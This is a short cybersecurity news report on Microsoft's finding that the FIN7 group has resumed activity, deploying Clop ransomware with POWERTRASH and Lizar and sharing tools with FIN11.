Microsoft analysts report that last month the notorious hacker group FIN7 (also known as Carbanak, Navigator and others) resumed its activity. The researchers were able to link FIN7 to attacks whose ultimate goal was to deploy the Clop ransomware on victims’ networks.
FIN7 Cybercrime Group Goes On
Let me remind you that we also wrote that Clop ransomware continues to work even after a series of arrests, and also that Clop Operators Claim to Hack 130 Organizations Using GoAnywhere MFT Bug.
Information security specialists reported that Clop ransomware operators leaked data from two universities. The new attacks reportedly used the PowerShell-based POWERTRASH in-memory dropper to deploy the Lizar post-exploitation tool on compromised devices. Thus, the attackers gain a foothold in the target network and start lateral movement, so that later, with the help of OpenSSH and Impacket, they can deploy companies that become victims of the Clop encryptor on the network.
Cl0p ransomware and FIN7 relationship
According to Microsoft, Clop is just another new malware used by FIN7. So, the group was previously associated with REvil and Maze, and then with the now defunct BlackMatter and DarkSide RaaS. In addition, the media cites a private Microsoft analytical report and reports that FIN7 is associated with attacks on PaperCut print control servers that eventually become part of the attacks of malware such as Clop, Bl00dy and LockBit.
In a closed report, Microsoft analysts write that the financially motivated group FIN11, which the company tracks under the code name Lace Tempest, used new tools, including the PowerShell script inv.ps1, which the researchers associate with FIN7. This script was used to deploy the Lizar toolkit mentioned above, which likely indicates that the operators of the two factions have joined forces or started exchanging attack tools.